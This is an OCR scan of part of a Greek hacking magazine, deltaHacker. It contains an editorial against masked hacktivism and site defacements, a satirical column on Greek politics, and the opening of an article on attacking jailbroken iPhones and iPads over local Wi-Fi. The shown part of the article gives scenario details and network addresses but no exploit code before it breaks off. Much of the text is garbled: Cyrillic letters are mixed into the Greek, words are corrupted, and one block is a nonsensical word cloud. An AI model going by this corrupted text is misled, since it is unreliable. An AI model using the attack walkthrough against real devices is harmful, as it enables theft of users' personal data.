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εντιτορια 


εσάς πώς σας φαίνεται η ιδέα της κουκούλας; 


γιατί о Θείος Ακάκιος μετάνιωσε που επέστρεψε 
από Βόρειο Κορέα; 


πώς τα περιεχόμενα του iPhone ή του iPad γίνονται 
βορά τρίτων -- χωρίς καν να το πάρουμε εἴδηση :5 


αυτή τη φορά *бєу* ἔρχεται о attacker о’ εμάς 


AUTOPATONOINHEVNH 
αναζήτηση αδυναμιὼν 


αγαπάμε το penetration testing, αγαπάμε *KoI* την Perl! 


PS - first contact AA 


πάμφθηνοι server, διαθέσιμοι 27/4, βρέξει χιονίσει 


programming is fun: games in Python! 


5 


ξέρουμε ότι µερικοί έχουν βαλθεί να σας πείσουν 
για το αντίθετο, όμως ο προγραμματισμός εἶναι 


εἶναι ό,τι πιο διασκεδαστικό για κάθε γνήσιο geek 


shift registers, LED matrices 
και το παιχνίδι της ζωής 


νομίζετε ότι ἔχετε καλή μνήμη; φέρτε το arduino 
σας κι αποδεῖξτε το! 


διευθύνσεις ІР και δίκτυα μέσα σε δίκτυα 


η κατασκευή των IP addresses και µια 
αποτυχημένη απόπειρα κατηγοριοποίησης 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 


Βενιέρης, Πώργος Πάννου, Μανώλης Κιαγιάς, Γιῶργος 

Μελέκος, Νίκος Μουρατίδης, Μέσος Παπαδόπουλος 

(TM), Χρίστος Τόμπρας, Σιφάκης Νικόλαος 
Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται and την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. H Parabing Creations έχει την Ебра της στη Μαιώ- 
τιδος 3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται ano την ThessPrint 
Α.Ε. То email επικοινωνίας του περιοδικού εἶναι το talk2us@deltahacker.gr και το email 
για τις συνδρομὲς το subscriptions@deltahacker.gr. Οι пАпрофоріес για τις συνδρομές 
εἶναι στο http://deltahacker.gr/subscriptions και о! παραγγελίες γίνονται апо To http:// 
deltahacker.gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφράζουν ana- 


ραἰτητα και τη γνώµη του περιοδικού. 


(*) 27128, εἶναι πολλά; 


gens 


пе ре їн 


DNS tunctins ΜΗ 2000? ЕП “65 robots 


ας constfuctionsfiltering network ger Та Е 


us backdoors ЧЕ ol FeverSing τι 


rin 


access Б "= 
Android 2 Assembly оо we © Windows 

AZ == [0 [à m min ya ΜῈ 
Al == өл shell 

“шет cryptography єз 14 bl I! poi: 501 П | [| g $0 ci al 12 Е. εν, 

Arduino == 55 eficryption hi Ruby їйїп n> = 
ting O SET security И μη 
криз = decryption lad = | Ë өкі 
5 2 firmware hashing гееру; Ше locking passwords 959 
s 
Είστε από εκείνους Αν ναι, τότε εἶστε αναγνώστης 
που δεν βλέπουν τον υπολογιστή τους του περιοδικού deltaHacker 
ως ἄλλη µια οικιακή συσκευή; ἔστω кі αν δεν έχετε γίνει ακόµα! 


Το deltaHacker έχει ως αποκλειστική αποστολή 
να ξυπνήσει τον δημιουργικό χάκερ µέσα σας 
και για να το πετύχει κυκλοφορεί 12 φορές το χρόνο 
αλλά όχι στα περίπτερα. 


Γίνετε τώρα συνδρομητής στο ένα και μοναδικό περιοδικό που ακονίζει το μυαλό 
και κάνει τους υπολογιστές, τα δίκτυα και το hardware ξανά ενδιαφέροντα. 


Χαρίστε στον εαυτό σας ή στους ανθρώπους σας 
µια συνδρομή στο περιοδικό 


YV HAGKER 


Гейоғіс από την ύλη του περιοδικού στο http://deltaHacker.gr 
Αγορές τευχών/συνδρομών στο http://deltaHacker.gr/order 


ІЗ http://twitter/deltaHacker 
Hf Το deltaHacker είναι αποκλειστικά συνδρομητικό, αποστέλλεται ταχυδρομικά και δεν 
f http://facebook.com/deltaHacker κυκλοφορεί στα περίπτερα. О! αγορές μεμονωμένων τευχών ή συνδρομών γίνονται 


http://gplus.to/deltaHacker δικτυακά, από το http://deltaHacker.gr/ order 


Οι κουκούλες, 
ο κινηματογράφος 
και η πραγματική ζωὴ 


Δεν ξέρουμε, αλλά σκεφτόμαστε ὁτι, εμεἰς τουλάχιστον, δεν θέλουμε να 
βάλουμε μάσκες ἡ να φορέσουμε κουκούλες. Ίσως εἶναι που δεν έχουμε και 
τίποτε να κρύψουμε. Στο κἀτω-κάτω, βάζοντας κουκούλα αισθανόμαστε 
σαν να συνομολογούμε τα εγκλήματα που µας αποδίδουν. Μπα. Αντὶ να 
Φορέσουμε εμεὶς, σκεφτόμαστε να φορέσουµε ос’ εκείνους, αφού αυτοί 
φαίνεται πως εγκληματούν. Αυτοί πρέπει να κρυφτούν κι επειδή, ας µη 
γελιόμαστε, δεν πρὀκειται να το κάνουν NOTE апо μόνοι τους, θα τους 
στείλουμε εμεἰς. Ξέρετε. Апо “кеі που ἦρθαν, για να το πούμε ευγενικά. 
Και фиска, όταν θα τους OTEAVOUHE, εμείς πάλι δεν θα φοράμε κουκούλα. 
Δεν θα κρύβουμε το πρὀσωπὸὀ µας, ἐτσι WOTE να µας βλέπουν οι Φίλοι, 
OI συνάδελφοι και τα παιδιὰ µας. Па να µας αναγνωρίζουν οι δικοί µας 
ἀνθρωποι, να παραδειγµατἰζονται, να παίρνουν κουράγιο και, στην τελική, 
να µη µας φοβούνται! Βέβαια υπάρχει κι ἄλλος λόγος για τον опоіо δεν θα 
κρύβουμε та πρὀσωπά µας: Па να µας βλέπουν κι εκεἰνοι τους οποίους θα 
«στἐλνουμε». Па να καταλάβουν ὁτι, TEAIKG, δεν εἰμαστε και τόσο ανόητοι, 
οὐτε ὁλα т” ἄλλα µε τα οποία µας στολἰζουν και που тіс περισσότερες 
φορὲς τελειώνουν σε «ἀκες». 


Κάθε λαός ἐχειτους δικούςτου ἦρωες. Δε μιλάω yia Ta μεγάλα ονόματα, 
για тіс σπουδαίες προσωπικότητες στην ιστορἱα κάθε τόπου. Αναφέρομαι 
στον απλὸ κόσμο, σε όλους εκείνους που πολέμησαν µε αυταπάρνηση 
για την ελευθερἱα και τη δικαιοσύνη. Μη βιαστείτε να µου πείτε ότι тора 
δεν έχουμε τίποτα απ’ Ta δύο. To αν εκεἰνοι οι ἄνθρωποι εξαπατήθηκαν, 
απέτυχαν ñ λοξοδρόµησαν εἶναι µια ἄλλη, μεγάλη κουβέντα. Σημασία ἐχει 
бт! οι νεότεροι μπορούν να πάρουν πολύτιμα μαθήματα апо το θάρρος των 
προγόνων τους, απὀ τις επιτυχίες, αλλά κι апо τα λάθη τους. O! νεότεροι 
μπορούν --кі οφεἰλουν-- να παίρνουν μαθήματα ano τους λαϊκούς ἠρωες. 
Αλήθεια, ξέρετε γιατί το μπορούν; Nati, πολύ апла, οι αγωνιστὲς κάθε 
τόπου, οι πραγµατικοἰ λαϊκοί ήρωες, δεν φορούσαν NOTE κουκούλες. ТІС 
κουκούλες τις χρησιμοποιούσαν οι δήμιοι και γενικότερα οι ἄνθρωποι του 
«βασιλιά» -- εντὸς κι εκτὸς εισαγωγικών. 


Αυτός µε το κρυμμένο πρὀσωπο δεν εἶναι ἠρωας, οὐτε μάγκας. 
Αυτὸς που κρύβει το просопо του ἐχει μάλλον θυμώσει. Οὐτε кі AUTÒ 
εἰναι σίγουρο όμως. То μόνο σίγουρο εἶναι ότι *бєу* έχει αποφασίσει уа 
συγκρουστεί πραγματικά. O άνθρωπος µε το κρυμμένο πρὀσωπο μπορεὶ 
να διδάσκει σήμερα τον ανένδοτο αγώνα κι αὐριο, αν αυτὸς ο αγώνας 
αποτύχει, να βγάλει την κουκούλα και να πει στους αντιπάλους του: «Με 
μπερδεύετε р’ ἀλλον! Eyo μαζὶ σας εἶμαι!». Βέβαια δεν εἶναι σίγουρο ὁτι 
о τύπος µε την κουκούλα θα λειτουργήσει ἐτσι, αλλά εἶναι πιθανὀ. Κανεὶς 


δεν NOPE! va το αποκλείσει, πάντως. Τελικά, σε ποιον απευθύνεται 
η κουκούλα και τι ἐχει να του προτείνει; Μήπως --ανάμεσα σε ἀλλα-- 
η κουκούλα διδάσκει και τον τυχοδιωκτισμὀ; Ξέρετε, ἄλλο праүна η 
ευελιξία κι ἄλλο πρἀγµα το βόλεμα υπό *бАєс* τις συνθήκες. 


Οἱ κουκούλες φτιάχνουν όμορφες ταινίες. AuTO πρέπει να το 
παραδεχτούμε. Οι κουκούλες προσδίδουν Eva капою μυστήριο, 
δημιουργούν συναισθηματικἁ φορτισμένες σκηνὲς και τελικἁ κάνουν 
τις ταινίες ευχάριστες κι ενδιαφέρουσες. Αυτές οι ταινίες, ὁμως, δεν 
θα μπορούσαν ποτὲ να λειτουργήσουν σαν οδηγὀς για τη ζωή. Εἶναι 
που απ’ αυτὲς τις ταινίες απουσιάζουν τα πιο κρίσιμα στοιχεία: Εκείνα 
που κάνουν ἑναν αγώνα της πραγματικἠς ζωἠς χρήσιμο και ρεαλιστικὀ. 
Αναφερόμαστε στη συνέχεια και στην προοπτικἠ. Αυτές οι ταινίες δε 
λένε τίποτα για το σκοπὀ, τις φιλοδοξίες και τον τελικὀ στὀχο των 
«μαχητών». Παρουσιάζουν μόνο Eva απόμακρο буро κι αποσιωπούν 
πλήρως το пос θα υλοποιηθεί. Σήμερα петохане µια νίκη. Апо αὐριο τι 
θα κάνουμε, βρε αδερφέ; Τους διώξαμε για πάντα τους κακούς; Ποιοι 
ἦταν τέλος πάντων και τρομάξανε τόσο εὐκολα; 


Μην προσπερνάτε την τελευταία ερώτηση. Το ποιους θέλουμε va 
διώξουμµε εἶναι στενἁ συνδεδεμένο µε το πώς. Αλλιώς θα διώξεις vav 
τύραννο, αλλιώς θα διώξεις µια ολόκληρη τάξη τυράννων και εντελὠς 
διαφορετικἁ τον απλὀ κόσμο που συμμετέχει σε µια συγκέντρωση. 
Παρεμπιπτόντως, οι τελευταίοι ενδέχεται να τρομάξουν ano ша 
παρέλαση κουκουλοφόρων, αλλά ευτυχώς OX! πάντα. 


Επειδἠ кайт! πέτυχε στον κινηματογράφο, δε σημαίνει OT! θα 
πετύχει και στη ζωή. Εκτὸς αν το ζητούμενο εἶναι να ζήσουμε μερικὲς 
ρομαντικὲς στιγμές, σαν αυτὲς που ζουν οι фаутаотікоі ἠρωες στα 
παραμύθια. Τότε, ναι, η µεταφορά µιας ταινίας στη ζωή μπορεί να ει 
σπουδαία αποτελέσµατα. Όταν орос ἐχουμε ουσιαστικοὺς στόχους, 
όταν θέλουμε у’ αλλάξει η ζωή µας, τότε η απὀπειρα μεταφορὰς µιας 
ταινίας εἶναι µια ουτοπία. Μία ουτοπία που την εντοπίζουν οι аутіпалоі 
нас και τρίβουν τα χἐρια τους, µε χαρά κι ανακούφιση. 


Μάθατε για τα νέα μέτρα; Δεν θα συζητήσω то ау εἶναι αναγκαία ἡ 
ὀχι. Νομίζω όμως бт! για τ’ αποτελἐσματὰ τους κανεὶς δεν αμφιβάλλει. 
Νομίζω, enionc, От! θα συμφωνήσουμε και στο бт! κανένα deface, 
κανενὸς site, δεν θα δώσει δουλειά, περίθαλψη και σύνταξη σε αυτούς 
που τα ¿xouv ανάγκη... 
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Αγαπητοί µου, 


Elva μερικές βδομάδες τώρα που έχω επιστρέψει από την Βόρειο Κορέα 
καν πραγματικά αναρωτυέµαι αν έκανα καλά. 

Με αυτά που διαβάζω παν ακούω εδώ γύρω αναρωτυέµαν μήπως θα ήταν 
καλύτερα να έχω µείνεν EXEL καν να στέλνω τις ανταποκρίσεις µου µε Ta— 
XVOPOPLHO περιστέρν. Ωραία ήταν, ο καιρός κρύος αλλά ξηρός, το δωμάτιο 
στο ξενοδοχείο pra χαρά, ον Βορειοκορεάτες συµπαθείς (αν καν λίγο επνφυ- 
λακτικοί)... Te µε πείραζε: 

Με πείραζε, όμως. Κι έτσι επέλεξα να επιστρέφω στη γαλανή µας πατρί- 
δα. 

Με έππληξη συνειδητοπονώ Өту η γαλανή µας πατρίδα έχει реу μεγαλύτερη 
ηλιοφάνεια, αλλά τα πράγματα πάνε από το κακό στο χειρότερο. 

Τελικά δεν ξέρω αν έχουµε, ἡ αν πραγματικά µας αξίζεν να έχουµε, ελ- 
πίδα. 

O ανιφνός λέεν OTL δεν έχουµε, αλλά αυτός την έχεν ήδη κάνει үш. αλλού. 
Εμείς όμως; Μέσ' στο καζάνι να βράζουµε, XL αντί να προσπαθούμε όλοι 
μαζί να βγούμε, να βαράµε µε το στυλιάρι καθέναν που πάει κάτι να κάνει, 
καν να τραβάµε από κάτω το καπάκι, να μένειν κλειστό μπας καν ξεφύγεν 
λίγος ατμός. 

Αυτό που µε κάνει καν κοχλάζω (по pun indended) είναι -το έχω čava- 
πεί-- OTL κανείς δεν δείχνεν να κάνει µια ειλικρινή προσπάθεια να καταλάρεν 
πώς πραγματικά φτάσαμε εδώ που φτάσαμε. (Δηλαδή στον πάτο του καζα- 
ννούε) 

Δεν είναν εύκολο, το παραδέχομαν. Δεν είναν καν αυτονόητο OTL αν κά- 
νουν ELALKPLVT) προσπάθεια δύο διαφορετικοί άνθρωπον, ας πούμε εγώ καν η 
Κυρία Καίτη, От θα φτάσουν σε ἴδια συμπεράσματα. Στην πραγματικότητα 
OXL µόνο αυτονόητο δεν είναν, αλλά οὐτε καν επιθυμητό. 

Το ζήτημα δεν είναι να φτάσουμε στα (бка, συμπεράσματα. To ζήτημα εί- 
VaL να φτάσουμε σε συμπεράσματα τα οποία να είναν έγκυρα оло µεθοδολο- 
γυκής πλευράς, και άρα χρήσιμα (δηλαδή χρησυμοποιήσυμα). 

То θα αν εἶναι ἴδια ἢ оҳи εξαρτάταν από τις αρχικές παραδοχές. 

Για παράδειγµα, δεν µπορεί η ερμηνεία µας για το πώς φτάσαμε εδώ που 
φτάσαμε να περιορίζεται στην απόδοση ευθυνών στους άλλους. Δεν µπορεί 
πάντα να φταίνε ον άλλον. Μόνο OL άλλον. Δεν γίνεται. Βίναν παράλογο. 

Πες ας πούμε OTL είσαν αγανακτισμένος (whatever that means). Μου- 
τζώνεις τους πολιτικούς. ΟΚ. Φταίνε ον πολιτικοί. ΟΚ. Βρώτησις: Φταίνε 
μόνο OL πολιτικοί; Με το ζόρι έκαναν 0,7, έκαναν; Ποιος τους ανεχόταν» 
Ποιος τους 91706; Ποιος τους ξαναφήφιζεΣ 


Σνέιλ μέιλ 
“Αα 


ОК, πες ÓTL δεν ήξερες. Χμμμ. Τα ίδια έλεγαν και στην Γερμανία µετά тоу 
πόλεμο. Κανείς δεν ήξερε. Αλλά. έστω, ας πούμε OTL εσύ ειδικά δεν ήξερες. 
Ας το δεχτούμε. Όμως δεν ήξερε κανείς} Κανείς απολύτως» Ληλαδή πώς γίνε- 
ταν αυτό; 

Μην µε παρεξηγάτε. Δεν λέω OTL όλον φταίµε εξ ἴσον. Λέω όμως OTL av 
δεν το παραδεχτούμε πως όλον έχουμε παίξει κάποιον ρόλο, εἴτε ενεργητι- 
κά -δηλαδή κάνοντας κάτι- είτε παθητικά -δηλαδή µην κάνοντας κάτν-, αν 
δεν παραδεχτούμε OTL όλον έχουµε συμβάλεν µε το μικρό µας, μνκρούτσικο, 
λάθος, τότε είµαστε καταδικασμµένον να το επαναλάβουμε. 

Σου λέει ο άλλος, «μαζί τα φάγαμε», καν βγαίνεις µε νερή αγανάκτηση 
να τον πατακεραυνώσεις. «Όχν хори, δεν τα φάγαμε μαζί!», τον λες. Καν 
καθάρισες. 

Καθάρισες πράγματι; 

Όταν ανεχόσουν τον ταζιυτζή να παίρνει διπλή καν τριπλή ταρίφα χωρίς 
να δίνεν λογαριασμό σε κανέναν; Όταν ανεχόσουν τον υδραυλικό να µη σου 
δίνει απόδειζη καν γλύτωνες έτσι τον ΦΠΑ; Όταν ανεχόσουν τον δημόσιο 
γνατρό που ζήταγε την αμουβή του σε μετρητά (λες καν δεν είχε κανονικό 
μισθό ο φτωχός); Όταν ανεχόσουν τους δημοσίους υπαλλήλους να παίρ- 
νουν «επίδομα αποδοτικότητας»; Δεν συμμετείχες και εσύ, τότε, εμμέσως ἡ 
αμέσως, στη διανώνιση του προβλήματος; Γνατί το παίζεις αθώα περιστερά 
τώρα» Καν γιατί δεν σε ενοχλεί OTL τώρα που είναι της μόδας να μουτζώνουν 
όλον τη Βουλή, δίπλα σου στέκεται ο ταξιτζής µε τη διπλή ταρίφα, και λίγο 
πιο κάτω ο υδραυλικός καν ο γιατρός; 


To ξαναγράφω για να το εµπεδώσουµε: το ζήτημα беу εἶναι να τα νσο- 
πεδώνει κανείς όλα αποδίδοντας στους πάντες τις ἰίδνες ευθύνες. Αλλά δεν 
μπορούμε να χώνουμε καν το κεφάλν µας στην ἄμμο επ' αόριστον. θα πά- 
θουµε τίποτα. Ασφυξία, av pn τν άλλο. 


ΣΤΗΣ | 
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Λιαβάζεις, ας πούμε, τη δημοσκόπηση για το GVOLYEG των κλειστών 
επαγγελμάτων. То 78% των πολιτών τάσσονται υπέρ. ΟΚ. 

Μετά διαβάζεις για να σχέδια να προχωρήσει то άνοιγμα τον ενός ἡ του 
άλλου χλευστού επαγγέλματος και νάσου, αἴφνης, ον επηρεαζόμενου επαγ- 
γελματίες να βγαίνουν στους δρόμους, να Χλείνουν τα μαγαζιά τους, να 
κλείνουν αεροδρόμια, να Ἀλείνουν τα τελωνεία. 


Ανατρέξτε στις εφημερίδες για να το τσεκάρετε, αν θέλετε -αν καν δε 
νομίζω бту θα χρειαστεί. Δεν υπήρξε οὔτε ένα επάγγελμα γνα το οποίο να 
συζητήθηκε η απελευθέρωσή TOV καν να µην ξεσηκώθηκαν ον συγκεκριμένου 
επαγγελματίες να διαμαρτυρηθούν. Ούτε ένα. 

Αναρωτιέσαι, λοιπόν. Και η δημοσκόπηση; Ψέματα είπαν όλοι; Άλλους ρώ- 
τησαν; Μήπως δεν κατάλαβαν την ερώτηση; Απορείς. Καν µετά κάθεσαι λίγο, 
το σκέφτεσαι και καταλαβαίνεις. 

Στην πραγματικότητα το πράγμα εἶναι απλό. То 78% των πολιτών elvar 
UNEP της απελευθέρωσης όλων των Ἑάλλων! κλειστών επαγγελμάτων, Жоу 
των δικών τους. 

Ан, πες το ETOL καλέ POV καν πήγα να ανησυχήσω. 

Πώς то λέεν ο θυµόσοφος λαός µας; Καν τον σκύλο ολάκερο και την πίτ- 
τα χορτάτη. H κάπως έτσι τέλος πάντων. 

Πολλές φορές έχω την αίσθηση OTL στη γαλανή µας πατρίδα ζούμε σε pra 
προσομοίωση. Μια προσομοίωση πρόχειρη, πακοφτιαγµένη, λες καν εἶναι 
ακόμα σε beta testing. 

Όλα ωραία καν καλά. Λεφτά έχουµε, ο ουρανός ασυννέφιαστος, το φεγ- 
γάρι γεμάτο, η παρέα εὔθυμη, η φωτιά στο τζάκι δυνατή, τα μαζεδάκια νό- 
στιµα, η μουσική απαλή, τα κορίτσνα όμορφα, τα αγόρια γοητευτικά. 

Κάποια στιγμή, ωστόσο, φτάνεις στα όρια της προσομοίωσης καν αρχί- 
ζουν τα παρατράγουδα. 

То τέλειο rendering του φόντου χαλάεν καν αρχίζεις ξαφνικά να βλέπεις 
wireframe παν πολύγωνα. H κίνηση αρχίζεν να χλωτσάει καν το πρόσωπο 
του πρωταγωνιστή γεμίζει τετραγωνάκινα. 

Αυτό ζούμε αυτούς τους μήνες. INV κατάρρευση της ελληνοπρεπούς µας 
προσομοίωσης σε αργή, απελπιστικά, αργή, κίνηση. 

Καν αντί να κάνουμε την καρδιά µας πέτρα καν να πατήσουμε то reset 
μπας καν καταφέρουμε να αποφύγουμε το Blue Screen of Death που αργά 
αλλά σταθερά πλησιυάζεν, εμείς κοιτάμε алб την ἄλλη Φάχνοντας να βρούμε 
κάπονον που να φταίει για να του τα φορτώσουμε όλα. 

Και αρχίζουμε να χακεύονμε σκοπιανά σάιτ καν να διαδίδουµε σόκυν 
ανέκδοτα για την Μέρκελ καν τον Σαρκοζί. 

Πού την βρήκαμε τόση βλακεία ένας θεός то ξέρει. 

Μη θυμώνετε, αγαπητοί µου, ας λέμε τα πράγματα µε το ὀνομά τους. 
Περί βλακείας πρόκειται, καν μάλιστα συλλογικής. Αλλιώς δεν εξηγείται να 
βλέπουμε την καταστροφή να έρχεται καν να καθόμαστε σαν τις πάπιες να 
την περιμένουμε. 

It doesn't make any sense. 


Σας ασπάζομαν, 
θείος Ακάκυος 


YV HAGKER 


Kavate Jailbreak oto iPhone/iPad; 
Συγχαρητήρια! Ελπίζουμε va λάβατε και µέτρα 
ώστε µην σας υποκλέπτουν όλα” σας τα 
δεδοµένα... [σελ. 12] 


Βλέπετε γνώριμα ασύρματα δίκτυα τριγύρω; Μη 
βιαστείτε να συνδεθείτε, μπορεί να µην εἶναι 
αυτό που νομίζετε![σελ. 22] 


Μετατρέψτε τη διαδικασία εκμάθησης της Python 
σε συναρπαστική ασχολία που καθηλώνει, 
φτιάχνοντας το δικό σας game! [σελ. 54] 


Είναι απίστευτο το τι µπορείτε να κάνετε μ' ένα 
LED matrix кол το αγαπημένο σας Arduino -- έως 
και την ἴδια τη ζωή μπορείτε va εξομοιώσετε ;) 
[σελ. 65] 
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by Dr@G 


To jailbreak ανοίγει πολλούς και συναρπαστικούς 
νέους δρόμους: Παρέχει πρόσβαση σε ρυθμίσεις 
που η Apple κρύβει, επιτρέπει την εὔκολη (кі 
ανέξοδη) προσθαφαΐρεση εφαρμογών, την 
προσθήκη νέων υπηρεσιών στο σύστημα και паі 
λέγοντας... Ταυτόχρονα όμως ανοἰγει κι Eva δρόμο 
για τους επιτιθέµενους -- τουλάχιστον στο βαθμὀ 
που δεν προσέχουμε τις κινήσεις µας :5 
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Όπως ὁλοι ξέρουμε, о μέσος χρήστης еудс smartphone dev праүнато- 
ποιεἰ αποκλειστικἁ και μόνο κλήσεις, οὐτε περιορίζεται ота SMS, στα 
MMS, στη χρήση ενσωματωμένης κάμερας και στην avanapaywyn pou- 
σικἠς. Όλα αυτά ἁλλωστε γἰνονται και µε та апла κινητά. Οἱ χρήστες 
των smartphone χρησιμοποιούν κυρἰως τις δυνατότητες δικτύωσης που 
παρέχει η συσκευὴ τους για να πάρουν та email τους, να συνδεθούν σε 
διάφορες δικτυακές υπηρεσίες και, үєміка, για να περιπλανηθούν στο 
Internet. Κάπως ἐτσι, όμως, ανοίγουν µια πολύ επικίνδυνη πόρτα. Επι- 
κίνδυνη για τους απρὀσεχτους ιδιοκτήτες και αρκετά ενδιαφἐρουσα για 
κάποιους ἄλλους. 


Ὄχι, δεν ισχυριζὀµαστε ὁτι η πρόσβαση στο Internet µε Eva smartphone 
εἶναι κατ’ ανάγκη επικίνδυνη, οὐτε ὁτι τα λειτουργικά συστήµατα των 
smartphone εἶναι γεμάτα κενὰ ασφάλειας. Εἶναι βέβαια γεγονὸς ότι ката 
καιρούς προκύπτουν διάφορα ζητήματα ασφάλειας, апо αδιάφορα ἑως 
πολὺ επικίνδυνα. Ωστόσο οι κατασκευάστριες εταιρεἰες φροντίζουν να 
αντιµετωπἰζουν τα ὀποια κενά ασφάλειας біауероутас updates, patches, 
κ.λπ. Παρ’ όλα αυτά, επιµένουμε: H σύνδεση στο δίκτυο µέσω smartphone 
παρέχει σε ορισμένους την ευκαιρἱα να πραγματοποιούν διάφορες επιθὲ- 
σεις -- και μάλιστα επιτυχημένες. Βλέπετε, ο νούμερο Eva κἰνδυνος, το 
μεγαλύτερο кеуд ασφάλειας που παρουσιάζουν τα smartphone, δεν ἐχει 
να κάνει µε το hardware ἡ To software αλλά µε τον απρὀσεκτο κι anai- 
δευτο χρήστη! Μπορεἰ να ακούγεται αλαζονικὀ, αλλά η κυριότερη aduva- 
ша των smartphone εἶναι ο ...катохос τους. 


Σε αυτὸ το άρθρο θα ασχοληθούμε µε тіс συσκευὲς που τρέχουν то iOS. 
Ὅπως ἴσως υποψιαστήκατε, μιλάμε γενικἀ για то iOS διότι δεν θα περιο- 
ριστούµε στα iPhone αλλά θα καλύψουμε και τα iPad. Συγκεκριµένα, θα 
αναλύσουμε ша απλἠ αλλά αποτελεσματικἠ και ἄκρως επικίνδυνη επἰθε- 
ση, η οποία πραγματοποιείται and iPhone σε iPhone ἡ апо iPhone σε iPad 
κι αντίστροφα. 


Επιθυμητέὲς (και µη) ευκολίες 


Ξεκίνησε σαν µια ασχολἰα, σαν Eva στοίχημα που έπρεπε va κερδηθεἰ апо 
κάθε χάκερ και σύντομα κατέληξε ψωμοτύρι για όλους! Αναφερόμαστε 
στο iOS jailbreaking. Με απλά λόγια, στη διαδικασία εξάλειψης όλων των 
περιορισμών που επιβάλει η Apple στις συσκευὲς της που τρέχουν iOS. 
Κατὰ τα γνωστά, σε µια jailbroken συσκευή, δηλαδή с’ Eva iPhone ἡ iPad 
που έχει εφαρμοστεί επιτυχώς η διαδικασία Tou jailbreak, μπορούμε va 
τροποποιήσουμε παραμέτρους της συσκευἠς που η Apple εἶχε φροντίσει 
να κρύψει, καθὼς και να εγκαταστήσουµε µη εγκεκριμένες εφαρμογές 
που *dev* παρέχονται ano το App Store. Αυτό το τελευταίο γίνεται µε 
το δημοφιλές εργαλείο Cydia, όπως επἰσης µε то installous και To online 
http://apptrackr.org. Ἔτσι, ο χρήστης µπορεί να κατεβάσει στη συσκευἠ 
του οποιαδήποτε εφαρµογή επιθυμεί, ciTe υπάρχει εἰτε ὀχι στο Apple App 
Store και πάντα χωρίς να πληρώσει οὐτε Eva cent. 


Κάπου εδώ προκύπτουν πολλά ερωτήματα σχετικἁ µε то αν πρέπει Ka- 
veic να παραβιάσει τους περιορισμούς της Apple ἡ αν οφείλει να τους 
σεβαστεἰ. Εμὰς όμως δεν µας ενδιαφἑρει η σχετικἠ Φιλολογία και δεν 
έχουμε κανένα λόγο να εμπλακούμε с’ αυτή την αντιπαράθεση. Σε εμάς 
арке! το γεγονός дті µια μεγάλη μερίδα χρηστών του iPhone και Tou iPad 
πραγματοποιούν τελικά το jailbreak. (Σ.τ.Ε. Και γιατι ὀχι, ano τη στιγµἠ 
που η συσκευή τους ανἠκει;) Ακριβώς εκεἰ ἐγκειται το EVOIGMEPOV µας και 
νομίζουμε ὁτι υποψιάζεστε το γιατὶ ;) Н ἴδια η διαδικασία Tou jailbreak δεν 
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εισάγει απαραιτήτως κενὰ στην ασφάλεια της συσκευής. Ωστόσο, ἑνας 
χρήστης που δεν εἶναι υποψιασμένος, ὁπως κι ἑνας καχύποπτος αλλά 
асхетос µε τα στοιχειώδη μέτρα ασφάλειας, μπορεἰ EUKOAG να την na- 
τήσει. Καλώς ἡ κακὠς, τέτοιοι χρήστες υπάρχουν πολλοί. Άλλωστε µην 
ξεχνάτε От! μιλάμε για συσκευὲς που απευθύνονται στο ευρύ κοινὀ κι Ох! 
κατ’ ανάγκη σε ανθρώπους που ασχολούνται µε τους υπολογιστὲς και τα 
δίκτυα. Κάπως έτσι, μαζὶ µε τα δεκάδες πλεονεκτήματα που προσφέρει 
το jailbreak, δημιουργεἰ ка! «τουλάχιστονκ va πρὀβλημα: H συσκευἠ 
αποκτά va τεράστιο κενὀ ασφάλειας που μπορεί να εκμεταλλευτεὶ ἑνας 
επιτήδειος, για να υποκλέψει όλα τα προσωπικἁ δεδομένα του χρήστη 
της συσκευής! 


Σε αυτὸ το ἆρθρο έχουμε βαλθεἰ να σας (απὀ)δεἰξουµε αυτὀν τον κἰνδυ- 
νο. Θα πρέπει όμως να ξεκαθαρίσουµε бт! δεν το κάνουµε κακοπροαἱρε- 
та, αλλά για εκπαιδευτικούς και μόνο λὀγους. Οι δοκιμὲς µας ἐγιναν στο 
топікд ασύρματο δίκτυο του εργαστηρἰου µας, στα νότια του Ανατολικού 
Τιμόρ. Σκοπὸς µας δεν εἶναι να δημιουργήσουμε αδιάκριτους εισβολείς 
µε παραφουσκωμένα μυαλὰ, αλλά να δείξουμε το πρόβλημα και φυσικά 
τη λύση, ώστε va εἰμαστε σε θέση να φυλάμε τους εαυτοὺς µας και τους 
γύρω µας. 


H επίθεση 


Το σενάριο που θα εξετάσουμε ἐχει ως εξής: O επιτιθἐµενος διαθέτει Eva 
σπασμένο (jailbroken) iPhone, ενώ то ανυποψίαστο θύμα ἐχει *eniong* 
ἑνα σπασμένο iPhone. Βέβαια µη νομίζετε бт! бта θα δούμε ισχύουν ano- 
κλειστικἀ για το συγκεκριµένο σενάριο. H διαδικασία της επίθεσης εἶναι 
πανομοιότυπη κι εξίσου επιτυχημένη ακόµα κι ὁταν γίνεται ano iPad σε 
iPad, ano iPad σε iPhone ἡ ano iPhone σε iPad. Επίσης, η ἐκδοση του iOS 
δεν παἰζει κανένα ρὀλο κι арке! µόνο το va ἐχει γίνει To jailbreak. 


Εικόνα 1 

Мє To Network 
Scanner тои iNet 
βλέπουμε στα γρή- 
yopa όλους τους 
host που ипар- 
χουν στο δίκτυο. 
Το iPhone του 
επιτιθέµενου εἰναι 
то <drg iphone> µε 
ІР то 192.168.1.8, 
ενώ η συσκευή 
του θύματος ἐχει 
τη διεύθυνση 
192.168.1.9. 
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Τα εφὀδια 


Архіка πρέπει να εξοπλίσουµε το 
біко µας iPhone µε τα κατάλληλα 
εργαλεία (ναι, για τις ανάγκες της 
παρουσίασης παίρνουμε το ρὀλο 


192.168.1.1 a > του επιτιθέµενου). Συγκεκριµένα, 

192.168.1.1 ano την εφαρµογή Cydia θα πρὲ- 

drg iphone > ΠΕΙ va εγκαταστήσουµε Ta sudo, 

